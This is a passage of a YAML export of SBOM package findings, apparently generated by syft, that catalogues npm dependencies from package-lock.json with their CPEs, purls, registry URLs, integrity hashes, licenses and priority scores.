cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32-msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32_msvc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_ia32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-ia32-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_ia32_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-win32-ia32-msvc@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-win32-ia32-msvc/-/swc-win32-ia32-msvc-14.2.3.tgz
|
|
integrity: sha512-vga40n1q6aYb0CLrM+eEmisfKCR45ixQYXuBXxOOmmoV8sYST9k7E3US32FsY+CkkF7NtzdcebiFT4CHuMSyZw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 42051f1b01ab97d3
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3'
|
|
title: '@next/swc-win32-x64-msvc 14.2.3'
|
|
description: 'Package discovered: @next/swc-win32-x64-msvc 14.2.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3812cfa26422b0fa
|
|
name: '@next/swc-win32-x64-msvc'
|
|
version: 14.2.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-x64-msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_x64_msvc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32-x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32_x64:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc-win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc_win32:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc-win32-x64-msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@next\/swc:\@next\/swc_win32_x64_msvc:14.2.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40next/swc-win32-x64-msvc@14.2.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@next/swc-win32-x64-msvc/-/swc-win32-x64-msvc-14.2.3.tgz
|
|
integrity: sha512-Q1/zm43RWynxrO7lW4ehciQVj+5ePBhOK+/K2P7pLFX3JaJ/IZVC69SHidrmZSOkqz7ECIOhhy7XhAFG4JYyHA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 22c53c131692682a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @noble/ciphers 1.3.0'
|
|
title: '@noble/ciphers 1.3.0'
|
|
description: 'Package discovered: @noble/ciphers 1.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e6d30724fc0ed7cf
|
|
name: '@noble/ciphers'
|
|
version: 1.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@noble\/ciphers:\@noble\/ciphers:1.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40noble/ciphers@1.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@noble/ciphers/-/ciphers-1.3.0.tgz
|
|
integrity: sha512-2I0gnIVPtfnMw9ee9h1dJG7tp81+8Ob3OJb3Mv37rx5L40/b0i7djjCVvGOVqc9AEIQyvyu1i6ypKdFw8R8gQw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d4d3b15cd9ed667f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @noble/hashes 1.8.0'
|
|
title: '@noble/hashes 1.8.0'
|
|
description: 'Package discovered: @noble/hashes 1.8.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 447b3d33bb79ef67
|
|
name: '@noble/hashes'
|
|
version: 1.8.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@noble\/hashes:\@noble\/hashes:1.8.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40noble/hashes@1.8.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@noble/hashes/-/hashes-1.8.0.tgz
|
|
integrity: sha512-jCs9ldd7NwzpgXDIf6P3+NrHh9/sD6CQdxHyjQI+h/6rDNo88ypBxxz45UDuZHz9r3tNz7N/VInSVoVdtXEI4A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 137b4dda2faad400
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @nodable/entities 2.1.0'
|
|
title: '@nodable/entities 2.1.0'
|
|
description: 'Package discovered: @nodable/entities 2.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f8f74773abf739cd
|
|
name: '@nodable/entities'
|
|
version: 2.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@nodable\/entities:\@nodable\/entities:2.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40nodable/entities@2.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@nodable/entities/-/entities-2.1.0.tgz
|
|
integrity: sha512-nyT7T3nbMyBI/lvr6L5TyWbFJAI9FTgVRakNoBqCD+PmID8DzFrrNdLLtHMwMszOtqZa8PAOV24ZqDnQrhQINA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 43aa448b0b5207b8
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @nodelib/fs.scandir 2.1.5'
|
|
title: '@nodelib/fs.scandir 2.1.5'
|
|
description: 'Package discovered: @nodelib/fs.scandir 2.1.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 09afc93bd06904eb
|
|
name: '@nodelib/fs.scandir'
|
|
version: 2.1.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@nodelib\/fs.scandir:\@nodelib\/fs.scandir:2.1.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40nodelib/fs.scandir@2.1.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@nodelib/fs.scandir/-/fs.scandir-2.1.5.tgz
|
|
integrity: sha512-vq24Bq3ym5HEQm2NKCr3yXDwjc7vTsEThRDnkp2DK9p1uqLR+DHurm/NOTo0KG7HYHU7eppKZj3MyqYuMBf62g==
|
|
dependencies:
|
|
'@nodelib/fs.stat': 2.0.5
|
|
run-parallel: ^1.1.9
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 562130ed42946717
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @nodelib/fs.stat 2.0.5'
|
|
title: '@nodelib/fs.stat 2.0.5'
|
|
description: 'Package discovered: @nodelib/fs.stat 2.0.5'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e6979906f7b5cde7
|
|
name: '@nodelib/fs.stat'
|
|
version: 2.0.5
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@nodelib\/fs.stat:\@nodelib\/fs.stat:2.0.5:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40nodelib/fs.stat@2.0.5
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@nodelib/fs.stat/-/fs.stat-2.0.5.tgz
|
|
integrity: sha512-RkhPPp2zrqDAQA/2jNhnztcPAlv64XdhIp7a7454A5ovI7Bukxgt7MX7udwAu3zg1DcpPU0rz3VV1SeaqvY4+A==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: e2cebc90e3a6fa01
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @nodelib/fs.walk 1.2.8'
|
|
title: '@nodelib/fs.walk 1.2.8'
|
|
description: 'Package discovered: @nodelib/fs.walk 1.2.8'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: e11d2a355e0d2438
|
|
name: '@nodelib/fs.walk'
|
|
version: 1.2.8
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@nodelib\/fs.walk:\@nodelib\/fs.walk:1.2.8:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40nodelib/fs.walk@1.2.8
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@nodelib/fs.walk/-/fs.walk-1.2.8.tgz
|
|
integrity: sha512-oGB+UxlgWcgQkgwo8GcEGwemoTFt3FIO9ababBmaGwXIoBKZ+GTy0pP185beGg7Llih/NSHSV2XAs1lnznocSg==
|
|
dependencies:
|
|
'@nodelib/fs.scandir': 2.1.5
|
|
fastq: ^1.6.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 371f10bc801b3e8a
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @one-ini/wasm 0.1.1'
|
|
title: '@one-ini/wasm 0.1.1'
|
|
description: 'Package discovered: @one-ini/wasm 0.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 8d849a9c4c0ebd39
|
|
name: '@one-ini/wasm'
|
|
version: 0.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@one-ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@one-ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@one_ini\/wasm:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@one_ini\/wasm:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@one:\@one-ini\/wasm:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@one:\@one_ini\/wasm:0.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40one-ini/wasm@0.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@one-ini/wasm/-/wasm-0.1.1.tgz
|
|
integrity: sha512-XuySG1E38YScSJoMlqovLru4KTUNSjgVTIjyh7qMX6aNN5HY5Ct5LhRJdxO79JtTzKfzV/bnWpz+zquYrISsvw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 3c1ae518b93a9e69
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @opentelemetry/api 1.9.1'
|
|
title: '@opentelemetry/api 1.9.1'
|
|
description: 'Package discovered: @opentelemetry/api 1.9.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 83e28d5e9e201d09
|
|
name: '@opentelemetry/api'
|
|
version: 1.9.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@opentelemetry\/api:\@opentelemetry\/api:1.9.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40opentelemetry/api@1.9.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@opentelemetry/api/-/api-1.9.1.tgz
|
|
integrity: sha512-gLyJlPHPZYdAk1JENA9LeHejZe1Ti77/pTeFm/nMXmQH/HFZlcS/O2XJB+L8fkbrNSqhdtlvjBVjxwUYanNH5Q==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: f729f38c8f735bd2
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @otplib/core 12.0.1'
|
|
title: '@otplib/core 12.0.1'
|
|
description: 'Package discovered: @otplib/core 12.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 4401cb5cafc706d8
|
|
name: '@otplib/core'
|
|
version: 12.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@otplib\/core:\@otplib\/core:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/%40otplib/core@12.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/@otplib/core/-/core-12.0.1.tgz
|
|
integrity: sha512-4sGntwbA/AC+SbPhbsziRiD+jNDdIzsZ3JUyfZwjtKyc/wufl1pnSIaG4Uqx8ymPagujub0o92kgBnB89cuAMA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: aa5d016d75962c38
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: @otplib/plugin-crypto 12.0.1'
|
|
title: '@otplib/plugin-crypto 12.0.1'
|
|
description: 'Package discovered: @otplib/plugin-crypto 12.0.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f17e31d5db2de66e
|
|
name: '@otplib/plugin-crypto'
|
|
version: 12.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin-crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin-crypto:12.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:\@otplib\/plugin_crypto:\@otplib\/plugin_crypto:12.0.1:*:*:*:*:*:*:*
|
|
